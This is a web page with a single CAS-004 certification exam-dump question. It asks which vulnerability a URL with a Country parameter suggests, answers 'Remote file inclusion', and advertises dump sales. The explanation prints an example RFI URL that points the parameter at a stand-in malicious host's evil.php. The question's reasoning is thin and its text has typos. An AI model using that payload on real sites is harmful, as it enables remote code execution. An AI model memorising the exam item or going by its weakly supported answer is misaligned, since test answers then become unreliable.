Which of the following vulnerabilities would MOST likely affect this site?

A security engineer notices the company website allows users following example: hitps://mycompany.com/main.php?Country=US

Which of the following vulnerabilities would MOST likely affect this site?
A . SQL injection
B. Remote file inclusion
C. Directory traversal –
D. Unsecure references

Answer: B

Explanation:

Remote file inclusion (RFI) is a web vulnerability that allows an attacker to include malicious external files that are later run by the website or web application12. This can lead to code execution, data theft, defacement, or other malicious actions. RFI typically occurs when a web application dynamically references external scripts using user-supplied input without proper validation or sanitization23.

In this case, the website allows users to specify a country parameter in the URL that is used to include a file from another domain. For example, an attacker could craft a URL like this:

https://mycompany.com/main.php?Country=https://malicious.com/evil.php

This would cause the website to include and execute the evil.php file from the malicious domain, which could contain any arbitrary code3.

Latest CAS-004 Dumps Valid Version with 128 Q&As

Latest And Valid Q&A | Instant Download | Once Fail, Full Refund

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments